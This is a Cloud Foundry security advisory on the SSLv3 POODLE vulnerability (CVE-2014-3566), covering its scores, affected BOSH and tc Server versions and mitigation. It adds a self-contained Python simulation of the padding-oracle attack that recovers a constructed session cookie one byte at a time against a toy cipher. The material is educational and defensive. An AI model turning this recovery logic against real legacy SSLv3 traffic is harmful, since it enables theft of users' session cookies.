Published: Oct 16, 2014 - 12:00 a.m.

CVE-2014-3566 SSLV3 POODLE | Cloud Foundry

Cloud Foundry
www.cloudfoundry.org

CVSS3: 3.4 Low
Attack Vector: NETWORK
Attack Complexity: HIGH
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N

CVSS2: 7.8 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:N/I:N/A:C

EPSS: 0.975 High (percentile 100.0%)

Note that the aggregator's CVSS2 vector above (no confidentiality impact, complete availability impact) does not match the advisory below, which describes POODLE as recovering plaintext such as session cookies, i.e. a confidentiality loss; the CVSS3 vector is the one consistent with that description.

CVE-2014-3566 SSLV3 POODLE

Severity: Moderate

Vendor: The SSL protocol 3.0, as used in OpenSSL through 1.0.1i

Versions Affected

  • SSLv3

Description

SSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346] and TLS 1.2 [RFC5246], many TLS implementations remain backwards compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience.

The protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used. However, even if a client and server both support a version of TLS, the security level offered by SSL 3.0 is still relevant, since many clients implement a protocol downgrade dance to work around server-side interoperability bugs: when a handshake at a higher version fails, the client retries with a lower one, and an active network attacker can trigger those failures simply by interfering with the TLS attempts until the client falls back to SSL 3.0. Attackers can exploit the downgrade dance and break the cryptographic security of SSL 3.0. The POODLE attack (Padding Oracle On Downgraded Legacy Encryption) allows them, for example, to steal "secure" HTTP cookies (or other bearer tokens such as HTTP Authorization header contents).
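The padding oracle behind the attack named above, as an added Python simulation that is not part of the Cloud Foundry advisory or of the POODLE paper it quotes. The record layer is a stand-in and every piece of it is an assumption of this example: HMAC-SHA256 as the record MAC, a four-round SHA-256 Feistel network as a 16-byte block cipher, an explicit random IV per record, a constructed cookie value, and the function names (`seal_record`, `open_record`, `poodle_recover`, `demo`) are the example's own. What is faithful to SSL 3.0 is the record layout (data, then MAC, then padding) and the receiver's padding check, which trusts only the final pad-length byte and never inspects the padding bytes themselves. The attacker is modelled as already sitting after the downgrade: it can make the client send records of chosen length (what the attacker's JavaScript does in the victim's browser) and observe whether the server accepts a tampered record. Copying the ciphertext block that holds a secret byte into the position of the all-padding final block is accepted exactly when that byte, after CBC's XOR with the neighbouring ciphertext, decrypts to the pad length 15, which leaks the byte after about 256 attempts.

```python
# Added illustration of the POODLE padding oracle; not code from the advisory or the paper.
# Assumptions (stand-ins): HMAC-SHA256 record MAC, a 4-round SHA-256 Feistel as a 16-byte
# block cipher, an explicit random IV per record, and a constructed cookie value. Faithful
# to SSL 3.0: the record layout data||MAC||padding, and a receiver that trusts only the
# final pad-length byte and never inspects the padding bytes themselves.
import hashlib
import hmac
import os

BLOCK = 16    # toy cipher block size
MAC_LEN = 32  # HMAC-SHA256 output length (real SSL 3.0 suites use MD5/SHA-1 MACs)


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, i, half):  # Feistel round function on an 8-byte half
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def encrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r


def decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r


def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = encrypt_block(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(decrypt_block(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)


def seal_record(enc_key, mac_key, data):
    """Sender: data || MAC || padding. SSL 3.0 padding bytes are arbitrary; last byte = pad length."""
    body = data + hmac.new(mac_key, data, hashlib.sha256).digest()
    padlen = BLOCK - 1 - len(body) % BLOCK   # 15 when body is block-aligned: a whole block of padding
    body += os.urandom(padlen) + bytes([padlen])
    iv = os.urandom(BLOCK)
    return iv, cbc_encrypt(enc_key, iv, body)


def open_record(enc_key, mac_key, iv, ct):
    """Receiver, SSL 3.0 style: strip padlen+1 bytes on the word of the last byte, then verify the MAC."""
    pt = cbc_decrypt(enc_key, iv, ct)
    padlen = pt[-1]
    if padlen >= BLOCK or len(pt) < padlen + 1 + MAC_LEN:
        return False                         # fatal alert
    body = pt[:len(pt) - padlen - 1]
    expected = hmac.new(mac_key, body[:-MAC_LEN], hashlib.sha256).digest()
    return hmac.compare_digest(body[-MAC_LEN:], expected)


def poodle_recover(secret_len, send, oracle):
    """send(prefix_len, suffix_len) -> (iv, ct) for plaintext
         b"P"*prefix_len + b"Cookie: " + secret + CRLF + b"S"*suffix_len
       (attacker-controlled lengths, as the attacker's JavaScript arranges in a browser);
       oracle(iv, ct) -> True iff the server accepted the record."""
    hdr, out = len(b"Cookie: "), bytearray()
    for j in range(secret_len):
        prefix_len = (BLOCK - 1 - hdr - j) % BLOCK                    # byte j ends a block
        suffix_len = (-(prefix_len + hdr + secret_len + 2)) % BLOCK   # data||MAC aligned: full padding block
        target = (prefix_len + hdr + j) // BLOCK                      # plaintext block holding byte j
        while True:                                                   # ~256 oracle calls per byte
            iv, ct = send(prefix_len, suffix_len)
            blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
            # blocks[k+1] encrypts plaintext block k, which CBC XORed with blocks[k].
            # Replace the all-padding final block with the target block and replay.
            if oracle(iv, b"".join(blocks[1:-1] + [blocks[target + 1]])):
                # Accepted => last decrypted byte == BLOCK-1 ==
                #   P_target[-1] ^ blocks[target][-1] ^ blocks[-2][-1]
                out.append((BLOCK - 1) ^ blocks[target][-1] ^ blocks[-2][-1])
                break
    return bytes(out)


def demo(secret=b"SESSION=7f3a9c2e"):
    """Victim client and server sharing keys; returns what the attacker recovers (constructed cookie)."""
    enc_key, mac_key = os.urandom(16), os.urandom(16)

    def send(prefix_len, suffix_len):
        data = b"P" * prefix_len + b"Cookie: " + secret + b"\r\n" + b"S" * suffix_len
        return seal_record(enc_key, mac_key, data)

    def oracle(iv, ct):
        return open_record(enc_key, mac_key, iv, ct)

    return poodle_recover(len(secret), send, oracle)


if __name__ == "__main__":
    print(demo())
```

Running it prints the constructed cookie back, recovered one byte per roughly 256 accepted-or-rejected records; that per-byte cost is why the attack needs a script in the victim's browser issuing many requests rather than a single captured session. TLS 1.0 and later require every padding byte to carry the pad length, so a moved block fails the padding check before the MAC is ever consulted; that check is what SSL 3.0 lacks and what makes the attack specific to it.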

Affected Products and Versions

Severity is moderate unless otherwise noted.

  • BOSH: All versions of Cloud Foundry BOSH stemcells 2743 and prior use SSLv3 and thus are vulnerable to CVE-2014-3566
  • tc Server 2.9.0 to 2.9.7 and 3.0.0 to 3.0.1. Previous, unsupported tc Server versions may also be affected.

Mitigation

The Cloud Foundry project recommends that HAProxy, or any other load balancer in use (for example an ELB), be updated to disable SSLv3 as a workaround that resolves CVE-2014-3566.

The details published by the Apache Software Foundation for mitigating this attack for Apache Tomcat apply equally to tc Runtime instances. The tc Server team is tracking the work of the Apache Tomcat project to release versions of Apache Tomcat that disable SSLv3 by default. tc Server releases will follow the releases from the Apache Software Foundation.

Credit

Google researchers Bodo Möller, Thai Duong and Krzysztof Kotowicz released a paper discussing a serious bug in SSL 3.0 that allows attackers to conduct man-in-the-middle attacks and decrypt the traffic between Web servers and end users.

References

History

2014-Oct-16: Initial vulnerability report published.

2014-Nov-03: Updated to include tc Server information.
